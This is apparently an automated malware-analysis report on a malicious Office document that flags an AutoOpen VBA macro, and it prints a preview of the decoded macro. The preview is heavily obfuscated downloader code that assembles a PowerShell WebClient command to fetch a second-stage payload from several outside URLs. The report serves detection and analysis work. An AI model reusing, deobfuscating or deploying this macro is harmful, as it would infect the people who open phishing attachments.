Verdict: MALICIOUS
Risk Score: 182

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, indicated by multiple heuristic firings including 'OLE_VBA_MACROS' and 'OLE_VBA_AUTOOPEN'. The 'macros.bas' script is heavily obfuscated but appears to construct and execute URLs, likely to download a second-stage payload. The presence of an AutoOpen macro suggests it executes automatically upon opening, aligning with a spearphishing attachment attack vector.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6582330-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6582330-0
- OLE document has large unaccounted-for region (high, OLE_SLACK_ANOMALY): OLE file is 172,032 bytes but its declared streams total only 36,009 bytes; 136,023 bytes (79%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 22221 bytes | 3e2579c95e33a670b0182fec9d62a4027dc339bed59467e61f16ea623b4b9f81 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "pOVZoXimBk"
Sub wSBnl(LBPhmM)
For zVAlrP = 55659 To XOCnZC
iztabP = bjiuaY + CDate(69091) + pCBucT + 44742 * ulHOYE / Sin(98486) + LdVWS / Sgn(76785) * (23133 + CDate(71184))
Next
Set OuRCz = EEsZzm
End Sub
Function oAPtKpKwl()
On Error Resume Next
For aWGDzp = 38156 To KXjhi
CMNBqQ = OYFrww + CDate(5613) + jizOj + 7279 * QOoWRL / Sin(7903) + hUOsC / Sgn(84434) * (60305 + CDate(45719))
Next
Set VvLwB = CtQri
For qNwACq = 85362 To uLBii
tfIjN = kYwwF + CDate(87419) + WTAoZ + 2010 * SLsiF / Sin(11894) + hrUwib / Sgn(40908) * (55582 + CDate(96140))
Next
Set MLlHRP = vJiWzt
VVzkapI = bjPCY("7V13+'e.q'+'3'+'D( '+'+ '+'BS'+'NMBN'+' + '+'q3DwK'+'hq'+'3D + '+'cilbu'+'p:vneM'+'B'+'N ='+' '+'C'+'DSM'+'BN;)q'+'3D@q3D(ti'+'lpS.q3D/skjj/'+'hc'+'.ocubm'+'a//'+':ptth@/C'+'X0o/ku.'+'o'+'c.in'+'imh'+'szS", 31071 + 3 - 31071, 31071 + 198 - 31071)
For bdXoi = 74919 To aHSChd
aRmtVU = OPAAws + CDate(74927) + XYkzzX + 3400 * juLFl / Sin(6876) + EklBU / Sgn(84189) * (92666 + CDate(56202))
Next
Set ZuMNXo = undkuS
For rLzJW = 10990 To iOziK
cnbJLw = pWQVJu + CDate(34794) + TlzzX + 68199 * BdGNa / Sin(85207) + fwAhw / Sgn(64087) * (56976 + CDate(59505))
Next
Set JaHZV = iAbnNP
cXDOjljjTsi = bjPCY("hMF6'+'ptth@'+'/z2UtN0X'+'/'+'moc.essidab/'+'/:ptth'+'@/7mggB'+'k'+'/uh.e'+'keyn'+'rok-n'+'o'+'talab'+'/'+'/:ptth '+' q3D = XC'+'DAMBN;'+')33'+'1'+'2'+'82 ,0'+'00'+'01(txen.dsad'+'asn'+'MBN = '+'BS4h", 69653 + 3 - 69653, 69653 + 193 - 69653)
For zimqKl = 95415 To wYkjq
Vcwkd = dpYQJw + CDate(10851) + FmmiqD + 1582 * uFXrh / Sin(7160) + CXpid / Sgn(17612) * (46694 + CDate(56630))
Next
Set kazHK = hNjzw
For wiQTuL = 27247 To cowMD
HoIjR = YuEwjB + CDate(81580) + pWZfI + 34181 * EHdPHq / Sin(36225) + fiuYBU / Sgn(50578) * (55529 + CDate(19734))
Next
Set JVEaR = sVuSFO
SajdJCAuzk = bjPCY("Ui@N('+')q3D'+'m'+'etI-eq'+'3D+'+'q3D'+'kq'+'3'+'D'+'+q3Dov'+'nIrkkaB", 23133 + 6 - 23133, 23133 + 61 - 23133)
For EmrCh = 58612 To JuGwZ
mcozO = PZwvZi + CDate(81071) + WmvAqQ + 34941 * mKRtwt / Sin(92358) + PGBBz / Sgn(31008) * (63148 + CDate(89518))
Next
Set MzqFq = YrmuX
For PMpPOl = 89577 To zRLGSC
ChoiS = NiFHB + CDate(79593) + LRDGPI + 86786 * AGzJq / Sin(85898) + RLwBT / Sgn(784) * (63467 + CDate(6862))
Next
Set CjTBd = IMvQli
jNHZiXw = bjPCY("Z@1wMnitt'+'o'+u5b", 97930 + 4 - 97930, 97930 + 9 - 97930)
For FrJJC = 3852 To pUcdtQ
IAWdiN = Dfpro + CDate(33504) + mOZGmE + 11253 * rKzfc / Sin(22734) + HpHMpz / Sgn(22827) * (48813 + CDate(76512))
Next
Set ULBMU = OkcCG
For riYXGC = 22967 To mVjKlw
iQqRt = CzmmT + CDate(77966) + MjiEpp + 59339 * tMAjH / Sin(96919) + QAjjk / Sgn(47644) * (85341 + CDate(21861))
Next
Set GiPpl = lnNOkF
SrZbUC = bjPCY("4Gq3D(&;)CDS'+'MBN'+' '+',)(tM'+'4gNeFnie'+'FnrtSoTtM4.cfsa'+'MBN('+'t'+'M4ele'+'FnIFda'+'Oe'+'Fnl'+'n'+'We'+'FnoDt'+'M4.UYIu0zPpB", 6860 + 8 - 6860, 6860 + 121 - 6860)
For cUvREo = 6525 To imOjhm
kEYTV = wHZpV + CDate(15625) + NVsNNY + 46577 * nSUEH / Sin(38263) + vBFDz / Sgn(66067) * (5084 + CDate(17503))
Next
Set RjWiMV = jjbcMt
For PuHfpC = 38416 To SAzaMK
roRKZb = KpNqq + CDate(47603) + uBkLJc + 19246 * afhLwA / Sin(82749) + hBzdJi / Sgn(9802) * (76197 + CDate(60827))
Next
Set wkSRw = vHYzN
ujPTMzUDz = bjPCY("UwZ5ufNM'+'BN;'+'tnei'+'lCbeW.teN.met'+'syS )'+'q3'+'D'+'tcejbo'+'-q'+'3D+q'+'3Dwq3'+'D'+'+q'+'3De'+'nq'+'3D'+'(.'+' ='+' U'+'YY'+'MBN;m'+'3", 2179 + 2 - 2179, 2179 + 133 - 2179)
For CilGN = 73913 To OfSTFf
qviMvw = vfZSJj + CDate(40375) + pcrWS + 98113 * sCUSK / Sin(33662) + iRMlJV / Sgn(99705) * (47881 + CDate(21911))
Next
Set QjGDL = EFIzpp
For NaOwLb = 59562 To dtmTPC
vWkZas = uaYpn + CDate(12453) + jFMBbZ + 7426 * wAvnr / Sin(75272) + HAzOdC / Sgn(61746) * (36965 + CDate(89407))
Next
Set EDfoZW = YBwnaR
YpkbbuCj = bjPCY("u4j'cs//:p'+'tth@/'+'7r'+'UAWp/rb.ite.a'+'r'+'ievi'+'lo'+'l'+'einad'jPO5B", 52771 + 6 - 52771, 52771 + 65 - 52771)
For dvhYji = 75094 To WESXs
dfAmS = WVYZY +
```

... (truncated)